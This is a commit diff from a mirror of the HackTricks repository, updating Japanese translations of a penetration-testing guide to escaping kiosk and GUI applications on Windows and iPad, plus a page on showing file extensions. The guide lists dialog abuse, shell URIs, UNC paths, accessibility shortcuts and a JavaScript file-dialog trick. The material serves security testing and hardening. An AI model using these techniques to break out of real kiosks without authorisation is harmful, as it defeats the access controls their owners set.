mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
Translated ['physical-attacks/escaping-from-gui-applications/README.md',
This commit is contained in:
parent
bc545a28fa
commit
399a0fe896
22 changed files with 904 additions and 1606 deletions
|
@ -1,64 +1,61 @@
|
|||
```markdown
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローしてください**。
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォロー**してください。
|
||||
* **HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有してください。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# GUIアプリケーション内の可能なアクションをチェックする
|
||||
# GUIアプリケーション内で可能なアクションをチェックする
|
||||
|
||||
**共通のダイアログ**は、**ファイルの保存**、**ファイルの開く**、フォントの選択、色の選択などのオプションです。ほとんどの場合、これらのオプションにアクセスできる場合、**完全なエクスプローラの機能**を提供します。
|
||||
**Common Dialogs**は、**ファイルの保存**、**ファイルの開く**、フォントの選択、色の選択などのオプションです。ほとんどの場合、**完全なExplorer機能を提供します**。これは、これらのオプションにアクセスできる場合、Explorerの機能にアクセスできることを意味します:
|
||||
|
||||
これは、次のオプションにアクセスできる場合、エクスプローラの機能にアクセスできることを意味します。
|
||||
|
||||
* 閉じる/閉じる
|
||||
* 開く/開く
|
||||
* 印刷
|
||||
* 閉じる/名前を付けて閉じる
|
||||
* 開く/開いて実行する
|
||||
* 印刷する
|
||||
* エクスポート/インポート
|
||||
* 検索
|
||||
* スキャン
|
||||
|
||||
次のことをチェックする必要があります:
|
||||
以下のことができるかどうかを確認する必要があります:
|
||||
|
||||
* ファイルの変更または作成
|
||||
* ファイルの変更または新規作成
|
||||
* シンボリックリンクの作成
|
||||
* 制限された領域へのアクセス
|
||||
* 制限されたエリアへのアクセス
|
||||
* 他のアプリの実行
|
||||
|
||||
## コマンドの実行
|
||||
## コマンド実行
|
||||
|
||||
おそらく、**_**開く**_**オプションを使用して、シェルの種類を開いたり実行したりできるかもしれません。
|
||||
**_**Open with**_** オプション**を使用して、何らかのシェルを開いたり実行したりすることができるかもしれません。
|
||||
|
||||
### Windows
|
||||
|
||||
たとえば、_cmd.exe、command.com、Powershell/Powershell ISE、mmc.exe、at.exe、taskschd.msc..._ ここでコマンドを実行するために使用できる他のバイナリを見つけることができます:[https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
例えば _cmd.exe, command.com, Powershell/Powershell ISE, mmc.exe, at.exe, taskschd.msc..._ ここでコマンドを実行するために使用できるバイナリをもっと見つけることができます: [https://lolbas-project.github.io/](https://lolbas-project.github.io)
|
||||
|
||||
### \*NIX __
|
||||
|
||||
_bash、sh、zsh..._ ここでコマンドを実行するために使用できる他のバイナリを見つけることができます:[https://gtfobins.github.io/](https://gtfobins.github.io)
|
||||
_bash, sh, zsh..._ もっとここで: [https://gtfobins.github.io/](https://gtfobins.github.io)
|
||||
|
||||
# Windows
|
||||
|
||||
## パス制限のバイパス
|
||||
|
||||
* **環境変数**:いくつかのパスを指す環境変数があります
|
||||
* **その他のプロトコル**:_about:、data:、ftp:、file:、mailto:、news:、res:、telnet:、view-source:_
|
||||
* **環境変数**: パスを指している多くの環境変数があります
|
||||
* **他のプロトコル**: _about:, data:, ftp:, file:, mailto:, news:, res:, telnet:, view-source:_
|
||||
* **シンボリックリンク**
|
||||
* **ショートカット**:CTRL+N(新しいセッションを開く)、CTRL+R(コマンドの実行)、CTRL+SHIFT+ESC(タスクマネージャー)、Windows+E(エクスプローラを開く)、CTRL-B、CTRL-I(お気に入り)、CTRL-H(履歴)、CTRL-L、CTRL-O(ファイル/開くダイアログ)、CTRL-P(印刷ダイアログ)、CTRL-S(名前を付けて保存)
|
||||
* 隠し管理メニュー:CTRL-ALT-F8、CTRL-ESC-F9
|
||||
* **シェルURI**:_shell:Administrative Tools、shell:DocumentsLibrary、shell:Librariesshell:UserProfiles、shell:Personal、shell:SearchHomeFolder、shell:Systemshell:NetworkPlacesFolder、shell:SendTo、shell:UsersProfiles、shell:Common Administrative Tools、shell:MyComputerFolder、shell:InternetFolder_
|
||||
* **UNCパス**:共有フォルダに接続するためのパス。ローカルマシンのC$に接続してみてください("\\\127.0.0.1\c$\Windows\System32")
|
||||
* **その他のUNCパス**:
|
||||
* **ショートカット**: CTRL+N (新しいセッションを開く), CTRL+R (コマンドを実行する), CTRL+SHIFT+ESC (タスクマネージャー), Windows+E (エクスプローラーを開く), CTRL-B, CTRL-I (お気に入り), CTRL-H (履歴), CTRL-L, CTRL-O (ファイル/開くダイアログ), CTRL-P (印刷ダイアログ), CTRL-S (名前を付けて保存)
|
||||
* 隠された管理メニュー: CTRL-ALT-F8, CTRL-ESC-F9
|
||||
* **Shell URIs**: _shell:Administrative Tools, shell:DocumentsLibrary, shell:Librariesshell:UserProfiles, shell:Personal, shell:SearchHomeFolder, shell:Systemshell:NetworkPlacesFolder, shell:SendTo, shell:UsersProfiles, shell:Common Administrative Tools, shell:MyComputerFolder, shell:InternetFolder_
|
||||
* **UNCパス**: 共有フォルダに接続するためのパス。ローカルマシンのC$に接続しようとする必要があります ("\\\127.0.0.1\c$\Windows\System32")
|
||||
* **その他のUNCパス:**
|
||||
|
||||
| UNC | UNC | UNC |
|
||||
| ------------------------- | -------------- | -------------------- |
|
||||
|
@ -74,9 +71,9 @@ _bash、sh、zsh..._ ここでコマンドを実行するために使用でき
|
|||
|
||||
## バイナリのダウンロード
|
||||
|
||||
コンソール:[https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
|
||||
エクスプローラ:[https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
|
||||
レジストリエディタ:[https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
コンソール: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
|
||||
エクスプローラー: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
|
||||
レジストリエディタ: [https://sourceforge.net/projects/uberregedit/](https://sourceforge.net/projects/uberregedit/)
|
||||
|
||||
## ブラウザからファイルシステムにアクセスする
|
||||
|
||||
|
@ -89,49 +86,48 @@ _bash、sh、zsh..._ ここでコマンドを実行するために使用でき
|
|||
| C:\windows\\ | C:\windows/ | %WINDIR% | %TMP% |
|
||||
| %TEMP% | %SYSTEMDRIVE% | %SYSTEMROOT% | %APPDATA% |
|
||||
| %HOMEDRIVE% | %HOMESHARE | | <p><br></p> |
|
||||
|
||||
## ショートカット
|
||||
|
||||
* Sticky Keys – SHIFTキーを5回押す
|
||||
* Sticky Keys – SHIFTを5回押す
|
||||
* Mouse Keys – SHIFT+ALT+NUMLOCK
|
||||
* High Contrast – SHIFT+ALT+PRINTSCN
|
||||
* Toggle Keys – NUMLOCKキーを5秒間押し続ける
|
||||
* Filter Keys – 右SHIFTキーを12秒間押し続ける
|
||||
* Toggle Keys – NUMLOCKを5秒間押し続ける
|
||||
* Filter Keys – 右SHIFTを12秒間押し続ける
|
||||
* WINDOWS+F1 – Windows検索
|
||||
* WINDOWS+D – デスクトップを表示
|
||||
* WINDOWS+E – Windows Explorerを起動
|
||||
* WINDOWS+E – Windowsエクスプローラーを起動
|
||||
* WINDOWS+R – 実行
|
||||
* WINDOWS+U – アクセシビリティセンター
|
||||
* WINDOWS+U – アクセスの容易さセンター
|
||||
* WINDOWS+F – 検索
|
||||
* SHIFT+F10 – コンテキストメニュー
|
||||
* CTRL+SHIFT+ESC – タスクマネージャー
|
||||
* CTRL+ALT+DEL – 新しいWindowsバージョンのスプラッシュスクリーン
|
||||
* F1 – ヘルプ
|
||||
* F3 – 検索
|
||||
* CTRL+ALT+DEL – 新しいWindowsバージョンではスプラッシュスクリーン
|
||||
* F1 – ヘルプ F3 – 検索
|
||||
* F6 – アドレスバー
|
||||
* F11 – Internet Explorer内のフルスクリーンの切り替え
|
||||
* CTRL+H – Internet Explorerの履歴
|
||||
* F11 – Internet Explorer内で全画面表示を切り替える
|
||||
* CTRL+H – Internet Explorer履歴
|
||||
* CTRL+T – Internet Explorer – 新しいタブ
|
||||
* CTRL+N – Internet Explorer – 新しいページ
|
||||
* CTRL+O – ファイルを開く
|
||||
* CTRL+S – 保存
|
||||
* CTRL+N – 新しいRDP / Citrix
|
||||
* CTRL+S – 保存 CTRL+N – 新しいRDP / Citrix
|
||||
|
||||
## スワイプ
|
||||
|
||||
* 左側から右にスワイプして、すべての開いているウィンドウを表示し、KIOSKアプリを最小化してOS全体にアクセスします。
|
||||
* 右側から左にスワイプして、アクションセンターを開き、KIOSKアプリを最小化してOS全体にアクセスします。
|
||||
* 上端からスワイプして、フルスクリーンモードで開いているアプリのタイトルバーを表示します。
|
||||
* 下から上にスワイプして、フルスクリーンアプリでタスクバーを表示します。
|
||||
* 左側から右にスワイプして、全ての開いているWindowsを表示し、KIOSKアプリを最小化してOS全体に直接アクセスする;
|
||||
* 右側から左にスワイプしてアクションセンターを開き、KIOSKアプリを最小化してOS全体に直接アクセスする;
|
||||
* フルスクリーンモードでアプリを開いているときに、上端からスワイプしてタイトルバーを表示する;
|
||||
* フルスクリーンアプリで下からスワイプしてタスクバーを表示する。
|
||||
|
||||
## Internet Explorerのトリック
|
||||
## Internet Explorerのコツ
|
||||
|
||||
### 'Image Toolbar'
|
||||
|
||||
画像をクリックすると、画像の左上に表示されるツールバーです。保存、印刷、メール送信、エクスプローラーで「マイピクチャ」を開くことができます。KioskはInternet Explorerを使用する必要があります。
|
||||
画像がクリックされたときに画像の左上に表示されるツールバーです。Save、Print、Mailto、Explorerで"My Pictures"を開くことができます。KioskはInternet Explorerを使用している必要があります。
|
||||
|
||||
### シェルプロトコル
|
||||
### Shell Protocol
|
||||
|
||||
次のURLを入力してエクスプローラービューを取得します。
|
||||
Explorerビューを取得するためにこのURLを入力します:
|
||||
|
||||
* `shell:Administrative Tools`
|
||||
* `shell:DocumentsLibrary`
|
||||
|
@ -152,75 +148,75 @@ _bash、sh、zsh..._ ここでコマンドを実行するために使用でき
|
|||
* `Shell:Windows`
|
||||
* `shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}` --> コントロールパネル
|
||||
* `shell:::{20D04FE0-3AEA-1069-A2D8-08002B30309D}` --> マイコンピュータ
|
||||
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> マイネットワークプレース
|
||||
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> マイネットワークプレイス
|
||||
* `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
|
||||
|
||||
# ブラウザのトリック
|
||||
# ブラウザのコツ
|
||||
|
||||
iKatのバックアップバージョン:
|
||||
iKatのバックアップバージョン:
|
||||
|
||||
[http://swin.es/k/](http://swin.es/k/)\
|
||||
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
|
||||
|
||||
JavaScriptを使用して共通のダイアログを作成し、ファイルエクスプローラーにアクセスします:`document.write('<input/type=file>')`
|
||||
ソース:https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
|
||||
JavaScriptを使用して一般的なダイアログを作成し、ファイルエクスプローラにアクセスする: `document.write('<input/type=file>')`
|
||||
出典: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
|
||||
|
||||
# iPad
|
||||
|
||||
## ジェスチャーとボタン
|
||||
## ジェスチャーとボトムズ
|
||||
|
||||
### 4本(または5本)の指で上にスワイプ/ホームボタンを2回タップ
|
||||
### 四本(または五本)の指で上にスワイプ / ホームボタンをダブルタップ
|
||||
|
||||
マルチタスクビューを表示してアプリを切り替える
|
||||
マルチタスクビューを表示し、アプリを変更する
|
||||
|
||||
### 4本または5本の指で片方向にスワイプ
|
||||
### 四本または五本の指で片方にスワイプ
|
||||
|
||||
次の/前のアプリに切り替えるため
|
||||
次/前のアプリに変更する
|
||||
|
||||
### 5本の指で画面をつまむ/ホームボタンをタッチ/画面の下から1本の指で上に素早くスワイプ
|
||||
### 五本の指で画面をピンチ / ホームボタンに触れる / 画面の下から一本の指で素早く上にスワイプ
|
||||
|
||||
ホームにアクセスするため
|
||||
ホームにアクセスする
|
||||
|
||||
### 画面の下から1本の指で1〜2インチスワイプ(ゆっくり)
|
||||
### 画面の下からゆっくりと1-2インチ(約2.5-5cm)一本の指でスワイプ
|
||||
|
||||
ドックが表示されます
|
||||
ドックが表示される
|
||||
|
||||
### 画面の上から1本の指で下にスワイプ
|
||||
### 画面の上から一本の指でスワイプ
|
||||
|
||||
通知を表示するため
|
||||
通知を表示する
|
||||
|
||||
### 画面の右上隅から1本の指で下にスワイプ
|
||||
### 画面の右上隅から一本の指でスワイプ
|
||||
|
||||
iPad Proのコントロールセンターを表示するため
|
||||
iPad Proのコントロールセンターを表示する
|
||||
|
||||
### 画面の左から1本の指で1〜2インチスワイプ
|
||||
### 画面の左から一本の指で1-2インチ(約2.5-5cm)スワイプ
|
||||
|
||||
今日のビューを表示するため
|
||||
Todayビューを表示する
|
||||
|
||||
### 画面の中央から右または左に素早く1本の指でスワイプ
|
||||
### 画面の中央から一本の指で素早く右または左にスワイプ
|
||||
|
||||
次の/前のアプリに切り替えるため
|
||||
次/前のアプリに変更する
|
||||
|
||||
### 上部右隅から1本の指で画面を押し続ける/スライドを右に全体に移動する
|
||||
### iPadの右上隅にあるOn/**Off**/Sleepボタンを押し続ける + **電源を切る**スライダーを右に全て動かす,
|
||||
|
||||
電源を切るため
|
||||
電源を切る
|
||||
|
||||
### 上部右隅のOn/**Off**/Sleepボタンを押し続ける/スライドを右に全体に移動する
|
||||
### iPadの右上隅にあるOn/**Off**/Sleepボタンとホームボタンを数秒間押し続ける
|
||||
|
||||
強制的に電源を切るため
|
||||
強制的に電源を切る
|
||||
|
||||
### 上部右隅のOn/**Off**/Sleepボタンとホームボタンを素早く押す
|
||||
### iPadの右上隅にあるOn/**Off**/Sleepボタンとホームボタンを素早く押す
|
||||
|
||||
スクリーンショットを撮影し、ディスプレイの左下に表示されます。両方のボタンを同時に非常に短く押すと、数秒間押し続けるように見えますが、強制的に電源が切られます。
|
||||
スクリーンショットを撮り、表示の左下にポップアップします。ボタンを数秒間押し続けると、強制的に電源が切れます。
|
||||
|
||||
## ショートカット
|
||||
|
||||
iPadのキーボードまたはUSBキーボードアダプターが必要です。アプリケーションからの脱出に役立つショートカットのみがここに表示されます。
|
||||
iPadのキーボードまたはUSBキーボードアダプタが必要です。ここでは、アプリケーションからの脱出に役立つ可能性のあるショートカットのみを示します。
|
||||
|
||||
| キー | 名前 |
|
||||
| --- | ------------ |
|
||||
| ⌘ | コマンド |
|
||||
| ⌥ | オプション(Alt) |
|
||||
| ⌥ | オプション (Alt) |
|
||||
| ⇧ | シフト |
|
||||
| ↩ | リターン |
|
||||
| ⇥ | タブ |
|
||||
|
@ -232,80 +228,27 @@ iPadのキーボードまたはUSBキーボードアダプターが必要です
|
|||
|
||||
### システムショートカット
|
||||
|
||||
これらのショートカットは、iPadの使用方法に応じて、ビジュアル設定とサウンド設定に使用されます。
|
||||
これらのショートカットは、iPadの使用に応じて視覚設定と音設定のためのものです。
|
||||
|
||||
| ショートカット | アクション |
|
||||
| -------- | ------------------------------------------------------------------------------ |
|
||||
| F1 | 画面を暗くする |
|
||||
| F2 | 画面を明るくする |
|
||||
| F7 | 前の曲に戻る |
|
||||
| F7 | 一曲戻る |
|
||||
| F8 | 再生/一時停止 |
|
||||
| F9 | 次の曲にスキップ |
|
||||
| F9 | 曲をスキップ |
|
||||
| F10 | ミュート |
|
||||
| F11 | 音量を下げる |
|
||||
| F12 | 音量を上げる |
|
||||
| ⌘ Space | 使用可能な言語のリストを表示します。選択するには、再度スペースバーをタップします。 |
|
||||
| ⌘ Space | 使用可能な言語のリストを表示する; 選択するには、もう一度スペースバーをタップします。 |
|
||||
|
||||
### iPadのナビゲーション
|
||||
### iPadナビゲーション
|
||||
|
||||
| ショートカット | アクション |
|
||||
| -------------------------------------------------- | ------------------------------------------------------- |
|
||||
| ⌘H | ホームに移動 |
|
||||
| ⌘⇧H (Command-Shift-H) | ホームに移動 |
|
||||
| ⌘H | ホームに行く |
|
||||
| ⌘⇧H (Command-Shift-H) | ホームに行く |
|
||||
| ⌘ (Space) | Spotlightを開く |
|
||||
| ⌘⇥
|
||||
| ⌘⇧⇥ (Command-Shift-Tab) | 前のアプリに切り替える |
|
||||
| ⌘⇥ (Command-Tab) | 元のアプリに戻る |
|
||||
| ←+→, その後 Option + ← または Option+→ | ドックを通じてナビゲートする |
|
||||
|
||||
### Safari ショートカット
|
||||
|
||||
| ショートカット | アクション |
|
||||
| ----------------------- | ------------------------------------------------ |
|
||||
| ⌘L (Command-L) | ロケーションを開く |
|
||||
| ⌘T | 新しいタブを開く |
|
||||
| ⌘W | 現在のタブを閉じる |
|
||||
| ⌘R | 現在のタブをリフレッシュする |
|
||||
| ⌘. | 現在のタブの読み込みを停止する |
|
||||
| ^⇥ | 次のタブに切り替える |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | 前のタブに移動する |
|
||||
| ⌘L | テキスト入力/URLフィールドを選択して変更する |
|
||||
| ⌘⇧T (Command-Shift-T) | 最後に閉じたタブを開く(複数回使用できる) |
|
||||
| ⌘\[ | ブラウジング履歴で1ページ戻る |
|
||||
| ⌘] | ブラウジング履歴で1ページ進む |
|
||||
| ⌘⇧R | リーダーモードをアクティブにする |
|
||||
|
||||
### メール ショートカット
|
||||
|
||||
| ショートカット | アクション |
|
||||
| -------------------------- | ---------------------------- |
|
||||
| ⌘L | ロケーションを開く |
|
||||
| ⌘T | 新しいタブを開く |
|
||||
| ⌘W | 現在のタブを閉じる |
|
||||
| ⌘R | 現在のタブをリフレッシュする |
|
||||
| ⌘. | 現在のタブの読み込みを停止する |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | メールボックス内を検索する |
|
||||
|
||||
## 参考文献
|
||||
|
||||
* [https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html](https://www.macworld.com/article/2975857/6-only-for-ipad-gestures-you-need-to-know.html)
|
||||
* [https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html](https://www.tomsguide.com/us/ipad-shortcuts,news-18205.html)
|
||||
* [https://thesweetsetup.com/best-ipad-keyboard-shortcuts/](https://thesweetsetup.com/best-ipad-keyboard-shortcuts/)
|
||||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか?** **HackTricks**で**会社を宣伝**したいですか?または、**PEASSの最新バージョンを入手**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
|
||||
|
||||
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、**[telegramグループ](https://t.me/peass)**に参加するか、**Twitter**で**フォロー**する[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
|
||||
</details>
|
||||
| ⌘⇥ (Command-Tab) | 最後に使用した10個のアプリをリストする |
|
||||
| ⌘\~ | 最後のアプリに行く |
|
||||
| ⌘⇧3 (Command-Shift-3) | スクリーンショット (保存またはアクションを行
|
||||
|
|
|
@ -1,73 +1,74 @@
|
|||
```markdown
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- 独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
* あなたの**会社をHackTricksに広告掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* 独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションである[**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のGitHubリポジトリ[**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## Windows XPでファイルの拡張子を表示する方法
|
||||
## Windows XPでファイル拡張子を表示する方法
|
||||
|
||||
1. Windows Explorerを開きます。これは、スタートメニューから「マイコンピュータ」をクリックすることで行うことができます。ただし、これはInternet Explorerとは異なるものです。
|
||||
2. Explorerのメニューバー(メニューバーはウィンドウのタイトルの下にある、Explorerウィンドウの上部にある)で「ツール」メニューをクリックします。表示されるポップアップメニューで「フォルダーオプション」アイテムをクリックします。
|
||||
3. ダイアログボックスが表示されます。ウィンドウの上部にある「表示」タブをクリックします。
|
||||
4. 「既知のファイルの拡張子を非表示にする」設定を探し、その横のチェックボックスをオフにします。
|
||||
5. 「すべてのフォルダに適用」ボタンをクリックします。その後、「適用」、そして「OK」をクリックします。
|
||||
1. Windowsエクスプローラーを開きます。スタートメニューから「マイコンピュータ」をクリックして行うことができます。これはInternet Explorerとは異なるものです。
|
||||
2. エクスプローラーのメニューバー(ウィンドウのタイトルの下にある)にある「ツール」メニューをクリックします。表示されるポップアップメニューで「フォルダオプション」をクリックします。
|
||||
3. ダイアログボックスが表示されます。「表示」タブをウィンドウの上部でクリックします。
|
||||
4. 「登録されているファイルの種類の拡張子を隠す」という設定を探し、その横にあるボックスのチェックを外して無効にします。
|
||||
5. 「すべてのフォルダに適用」ボタンをクリックします。次に「適用」をクリックし、「OK」をクリックします。
|
||||
|
||||
## Windows VistaおよびWindows 7でのファイル拡張子の表示
|
||||
## Windows VistaとWindows 7でファイル拡張子を表示する
|
||||
|
||||
1. スタートメニューをクリックします。これは画面の左下隅にある丸いアイコンです。
|
||||
2. 「folder options」と入力します(引用符なし)。スタートメニューの上部に表示される「Folder Options」という行をクリックします。
|
||||
3. 「Folder Options」というタイトルのダイアログボックスが表示されます。ウィンドウの上部にある「表示」タブをクリックします。
|
||||
4. 「既知のファイルの拡張子を非表示にする」のチェックボックスをオフにします。
|
||||
2. 「フォルダオプション」と入力します(引用符は不要です)。スタートメニューの上部に表示される「フォルダオプション」という行をクリックします。
|
||||
3. 「フォルダオプション」というタイトルのダイアログボックスが表示されます。ウィンドウの上部にある「表示」タブをクリックします。
|
||||
4. 「登録されているファイルの種類の拡張子を隠す」のボックスのチェックを外します。
|
||||
5. ダイアログボックスの下部にある「OK」ボタンをクリックします。
|
||||
|
||||
## Windows 8でファイルの拡張子を表示する方法
|
||||
## Windows 8でファイル拡張子を表示する方法
|
||||
|
||||
1. スタート画面を呼び出します。これを行う方法の1つは、マウスを画面の左下隅に移動することです。Windows 8では、スタート画面が表示されることを示す明示的な表示はありませんが、表示されます。
|
||||
2. 「folder options」と入力します(引用符なし)。スタート画面には空白のフィールドがないことを知っています。実際には何かを入力できることを示唆するものはありませんが、入力できます。単に入力します。
|
||||
3. 画面の左側には「検索結果が見つかりません」というがっかりするメッセージが表示されます。Windows 8のスタート画面の検索機能は、既に見つける場所を知っていて、それがどこにあるかを教えることができる場合にのみ、何かを見つけることができます。
|
||||
1. スタート画面を呼び出します。これを行う一つの方法は、画面の左下隅にマウスを移動することです。Windows 8では、これがスタート画面を表示することを示す表示はありませんが、表示されます。
|
||||
2. 「フォルダオプション」と入力します(引用符は不要です)。スタート画面には何かを実際に入力できることを示唆する空白のフィールドはありませんが、入力することはできます。入力してください。
|
||||
3. 画面の左側に「検索に一致するアプリはありません」という失望するメッセージが表示されます。Windows 8のスタート画面の検索機能は、あなたがそれを見つける場所をすでに知っていて、それがどこにあるかを教えることができる場合にのみ、何かを見つけることができます。
|
||||
|
||||
画面の右側にある「設定」という行をクリックします。
|
||||
4. 画面の左側には、「Folder Options」が可能な結果の1つとして表示されます。それをクリックします。
|
||||
5. 「Folder Options」というタイトルのウィンドウが表示されます。そのダイアログボックスの上部にある「表示」タブをクリックします。
|
||||
